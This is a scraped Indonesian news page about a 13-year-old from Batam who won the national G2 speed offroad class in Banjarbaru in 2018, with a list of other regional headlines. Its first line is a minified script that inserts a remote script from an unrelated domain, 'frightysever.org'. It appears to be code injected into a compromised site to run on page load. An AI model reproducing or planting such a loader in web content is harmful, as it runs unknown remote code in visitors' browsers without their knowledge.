(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Sport

Anak 13 Tahun dari Batam Ini Juara Nasional Speed Offroad 2018


BANJARBARU, Namanya, Bintang Barlean, asal Batam, dan umur masih 13 tahun. Ia baru saja memastikan sebagai juara nasional kelas G2 di kejurnas speed offroad Banjarbaru, Kalsel, Minggu (9/12/2018).

Didampingi navigator Anondo Eko yang juga Ketua IMI DKI, Bintang tampil trengginas di lintasan Mitra Citra City tersebut.

Tidak nyangka kalau offroader cilik dengan bendera Banteng Jagonya Ayam Motorsport itu ternyata masih duduk di bangku kelas 1 SMP di Batam.

Cukup mengejutkan tentunya. Pasalnya, kompetitornya adalah pebalap yang lebih dewasa.

Bagaimana ceritanya Bintang terjun sebagai offroader. Bintangnya mulai bersinar dan dibicarakan banyak orang sejak tahun lalu.

“Semua karena papa. Sejak umur 5 tahun, saya diajak kalau papa offroad. Lama-lama suka dan kepingin seperti papa,” ujar Bintang dinukil dari mobilionews.

Tapi, sebenarnya  Bintang ingin jadi pereli. Ia pun gape dan paham cas cis cus soal reli sampai World Rally Championship (WRC). Sebastian Ogier adalah pereli dunia favoritnya.

“Kalau soal pengetahuan reli, saya malah tanya sama dia,” ujar Frans Barlean offroader senior ayah Bintang.

Namun karena event reli masih kurang jumlahnya di Indonesia, bungsu dari 5 bersaudara ini akhirnya hijrah ke speed offroad.

Upaya memintarkan diri, terus dilakukan. Salah satunya sebelum dan selama  Kejurnas Speed Offroad, mendapat coaching clinic khusus dari pereli senior Rizal Sungkar.

Kini, dengan bimbingan setiap dari sang ayah yang sarat pengalaman, diyakini skill dan prestasi Bintang bakal mengkilap. Satu lagi bocah ajaib lahir dari ajang motorsport Tanah Air. (bs/kk)

Reporter:bs/kk
Editor:KK

Desy

Unit Cyber Kanal Kalimantan

Recent Posts

Hari Museum Internasional 2024 “Museum untuk Pendidikan dan Penelitian”

KANALKALIMANTAN.COM - Hari Museum Internasional yang ditetapkan oleh ICOM dan dirayakan setiap tahun pada tanggal… Read More

3 jam ago

Masrumi dari Desa Sungai Namang HSU Raih Prestasi Nasional

KANALKALIMANTAN.COM, SOLO – Masrumi, guru honorer asal Desa Sungai Namang, Kecamatan Danau Panggang, Kabupaten Hulu… Read More

4 jam ago

Pemkab HSU Gelar Upacara HUT ke-75 Proklamasi ALRI Divisi IV Kalimantan

KANALKALIMANTAN.COM, AMUNTAI - Memperingati HUT ke-75 Proklamasi Pemerintahan Gubernur Tentara ALRI Divisi lV Pertahanan Kalimatan,… Read More

4 jam ago

Mantan Karyawan BPR Candi Agung Amuntai Dituntut 7 Tahun

Selewengkan Dana Nasabah, Rugikan Negara Rp779 Juta Read More

5 jam ago

Ungkap Kasus Curanmor di Banjarbaru, 4 Unit Motor Berplat Merah

7 Pelaku Ditangkap dengan Barbuk 21 Unit Sepeda Motor Read More

9 jam ago

Kontestan Kepala Daerah di Kalsel Ditantang Miliki Visi Majukan Perpustakaan

KANALKALIMANTAN.COM, BANJARMASIN - Tim Tenaga Ahli Gubernur Kalimantan Selatan (Kalsel) melakukan kunjungan ke Dinas Perpustakaan… Read More

10 jam ago

This website uses cookies.